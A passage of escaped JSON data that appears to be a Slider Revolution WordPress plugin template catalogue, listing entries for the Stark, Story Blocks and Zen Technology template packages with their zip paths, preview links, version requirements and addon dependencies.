00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"434\":{\"id\":\"479\",\"title\":\"Stark Contact\",\"alias\":\"stark-contact\",\"zip\":\"packs\\/stark-contact.zip\",\"uid\":\"8d704226b7093123a9d9faf424da6c35\",\"img\":\"stark-contact\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"offset=\\\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:40px,30px,20px,10px;r:40px,30px,20px,10px;\\\" zindex=\\\"2\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"435\":{\"id\":\"480\",\"title\":\"Stark Footer\",\"alias\":\"stark-footer\",\"zip\":\"packs\\/stark-footer.zip\",\"uid\":\"e7132dc158e7dcdb4ef5b3a1aa00208a\",\"img\":\"stark-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.1\",\"required\":\"6.2.22\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"offset=\\\"t:-50px,-30px,-30px,-20px;b:40px,30px,20px,20px;l:140px,70px,50px,30px;r:140px,70px,50px,30px;\\\" zindex=\\\"3\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"436\":{\"id\":\"481\",\"title\":\"Stark Newsletter\",\"alias\":\"stark-newsletter\",\"zip\":\"packs\\/stark-newsletter.zip\",\"uid\":\"bb76ddd68dbe6bda5ece7e4227a51413\",\"img\":\"stark-newsletter\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/stark-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=stark-agency-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \\\"margin & padding\\\" feature. Create unique, customizable layouts!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Stark Website Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"usage=\\\"modal\\\" modal=\\\"s:#contact;\\\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"37\",\"installed\":false},\"437\":{\"id\":\"482\",\"title\":\"Big Summer Sale\",\"alias\":\"big-summer-sale\",\"zip\":\"big-summer-sale.zip\",\"uid\":\"a6779fa7109763209d234f9cf2e766c6\",\"img\":\"big-summer-sale\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/big-summer-sale-shop-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=big-summer-sale-shop-slider\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Big Summer Sale Shop Slider is a beautiful eye catcher for your e-commerce website!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Add an Animated Headline to Your Home Page [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-add-an-animated-headline-to-your-home-page-tutorial\\/\",\"guide_img\":\"tutorial\\/big-summer-sale.jpg\",\"active\":\"1\",\"installed\":false},\"438\":{\"id\":\"483\",\"title\":\"Traveller Carousel\",\"alias\":\"traveller-carousel\",\"zip\":\"traveller-carousel.zip\",\"uid\":\"185344ed6236bea2906a79035d1d5702\",\"img\":\"traveller-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/travel-blog-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=travel-blog-carousel\",\"version\":\"1.0.1\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A travel blog carousel with interesting parallax and ken burns effects!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">Note that the content visible on all slides can be edited on the \\\"global layers\\\" slide.<br\\/>Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create an Engaging Product Carousel for Your Online Shop [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-an-engaging-product-carousel-for-your-online-shop\\/\",\"guide_img\":\"tutorial\\/traveller-carousel.png\",\"active\":\"1\",\"installed\":false},\"439\":{\"id\":\"484\",\"title\":\"Project Carousel\",\"alias\":\"project-carousel\",\"zip\":\"project-carousel.zip\",\"uid\":\"49c85ad406da943bdd25f08fd6496748\",\"img\":\"project-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/project-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=project-carousel\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A project carousel with images and texts that can be customized easily!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"440\":{\"id\":\"485\",\"title\":\"News Carousel\",\"alias\":\"news-carousel\",\"zip\":\"news-carousel.zip\",\"uid\":\"76f5b939150092a30038f161084140ae\",\"img\":\"news-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/news-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=news-carousel\",\"version\":\"1.0.0\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A news carousel with images and texts that can be customized easily!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"441\":{\"id\":\"486\",\"title\":\"Story Blocks Website Template\",\"alias\":\"story-blocks-website-template\",\"zip\":\"\",\"uid\":\"story-blocks-website-template-package\",\"img\":\"packages\\/story-blocks-website-template-package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"442\":{\"id\":\"487\",\"title\":\"Story Menu\",\"alias\":\"story-menu\",\"zip\":\"packs\\/story-menu.zip\",\"uid\":\"1f2f7cd91480f15cff8e7100f788c650\",\"img\":\"story-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"443\":{\"id\":\"488\",\"title\":\"Story Header\",\"alias\":\"story-header\",\"zip\":\"packs\\/story-header.zip\",\"uid\":\"e1a5ad5018a24ccdc71c2863edfe775e\",\"img\":\"story-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"444\":{\"id\":\"489\",\"title\":\"Story Block 1\",\"alias\":\"story-block-1\",\"zip\":\"packs\\/story-block-1.zip\",\"uid\":\"2a9fee97dcf477e36d048af8a902f47a\",\"img\":\"story-block-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"445\":{\"id\":\"490\",\"title\":\"Story Content 1\",\"alias\":\"story-content-1\",\"zip\":\"packs\\/story-content-1.zip\",\"uid\":\"6773614bbce543b83a0d2b2ad8facc96\",\"img\":\"story-content-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"446\":{\"id\":\"491\",\"title\":\"Story Block 2\",\"alias\":\"story-block-2\",\"zip\":\"packs\\/story-block-2.zip\",\"uid\":\"2e708e3cebab57ca20b228ffba426ce7\",\"img\":\"story-block-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"447\":{\"id\":\"492\",\"title\":\"Story Block 3\",\"alias\":\"story-block-3\",\"zip\":\"packs\\/story-block-3.zip\",\"uid\":\"7156cf069f65644faf90122dab451231\",\"img\":\"story-block-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"448\":{\"id\":\"493\",\"title\":\"Story Content 2\",\"alias\":\"story-content-2\",\"zip\":\"packs\\/story-content-2.zip\",\"uid\":\"1223cd77d1f36d69e69ce50223e16ea7\",\"img\":\"story-content-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"449\":{\"id\":\"494\",\"title\":\"Story Block 4\",\"alias\":\"story-block-4\",\"zip\":\"packs\\/story-block-4.zip\",\"uid\":\"85ac48e8e8231d2c38206cba4e7ebb68\",\"img\":\"story-block-4\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"450\":{\"id\":\"495\",\"title\":\"Story Content 3\",\"alias\":\"story-content-3\",\"zip\":\"packs\\/story-content-3.zip\",\"uid\":\"82cac52f3ba79c0559fe0ad0cdf9d3b2\",\"img\":\"story-content-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/story-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=story-blocks\",\"version\":\"1.0.1\",\"required\":\"6.1.6\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Story Blocks Website Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"38\",\"installed\":false},\"451\":{\"id\":\"496\",\"title\":\"Animated Mini Website\",\"alias\":\"mini-website\",\"zip\":\"mini-website.zip\",\"uid\":\"cc6c0a3b0f933a88c43e2be0fa397c1c\",\"img\":\"mini-website\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/mini-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=mini-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The animated mini website template has a modern, vibrant design and can be customized easily! Get the #1 WordPress Builder with 200+ templates.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"452\":{\"id\":\"497\",\"title\":\"Food Delivery Hero\",\"alias\":\"food-delivery\",\"zip\":\"food-delivery.zip\",\"uid\":\"992e9b22ff43227a655eea341835d04c\",\"img\":\"food-delivery\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/food-delivery-hero\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=food-delivery-hero\",\"version\":\"1.0.1\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Yummy! This hero template convinces with a changing color background, a particle effect, vibrant illustrations and smooth mouse over effects.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false,\"is_new\":true},\"453\":{\"id\":\"498\",\"title\":\"Slider With Illustrations\",\"alias\":\"slider-with-illustrations\",\"zip\":\"slider-with-illustrations.zip\",\"uid\":\"ebc24280b669f26734c7fdd8b5683e9f\",\"img\":\"slider-with-illustrations\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/slider-with-illustrations\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=slider-with-illustrations\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A basic slider template with easy to customize content, colorful illustrations and pleasant parallax effects.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"454\":{\"id\":\"499\",\"title\":\"Zen Technology Website Template\",\"alias\":\"zen-technology-website-template\",\"zip\":\"\",\"uid\":\"zen-technology-website-template-package\",\"img\":\"packages\\/zen-technology-website-template-package.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"455\":{\"id\":\"500\",\"title\":\"Zen Menu\",\"alias\":\"zen-menu\",\"zip\":\"packs\\/zen-menu.zip\",\"uid\":\"3b53d755058b75fa6172510dcca2f2bb\",\"img\":\"zen-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.2\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"456\":{\"id\":\"501\",\"title\":\"Zen Header\",\"alias\":\"zen-header\",\"zip\":\"packs\\/zen-header.zip\",\"uid\":\"13d3cdde05308616fda7e2920a29e006\",\"img\":\"zen-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"457\":{\"id\":\"502\",\"title\":\"Zen About\",\"alias\":\"zen-about\",\"zip\":\"packs\\/zen-about.zip\",\"uid\":\"d50d4f9b43e025fa99503b9a4eec6551\",\"img\":\"zen-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/zen-technology-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=zen-technology-website\",\"version\":\"1.0.0\",\"required\":\"6.2.23\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Zen Technology Website Template is a modern, striking one-pager for your technology focused project. Easy to edit and get started!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"0000-00-00 00:00:00\",\"package\":\"Zen Technology Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"39\",\"installed\":false},\"458\":{\"id\":\"503\",\"title\":\"Zen 